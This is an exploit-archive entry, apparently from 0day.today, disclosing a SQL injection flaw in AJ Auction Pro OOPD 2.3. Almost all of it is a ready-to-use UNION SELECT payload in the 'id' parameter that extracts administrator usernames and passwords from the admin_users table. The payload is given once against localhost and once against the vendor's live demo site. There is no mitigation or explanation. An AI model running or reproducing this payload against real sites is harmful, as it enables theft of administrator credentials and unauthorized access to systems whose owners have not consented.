id: 4713
date: 01/20/2009
title: AJ Auction Pro OOPD 2.3 (id) SQL Injection Vulnerability
author: Snakespc
cves: 

========================================================
AJ Auction Pro OOPD 2.3 (id) SQL Injection Vulnerability
========================================================

                 ====================================================================================
                =                                                                                    =                                                                                   =
                =            http://www.ajsquare.com/products/auction/demo.php  "index.php"          =
                 ====================================================================================

Exploit:
http://localhost/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users--
********
demo:
http://www.ajauctionpro.com/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users--
============================================================================================================================



#  0day.today [2023-03-24]  #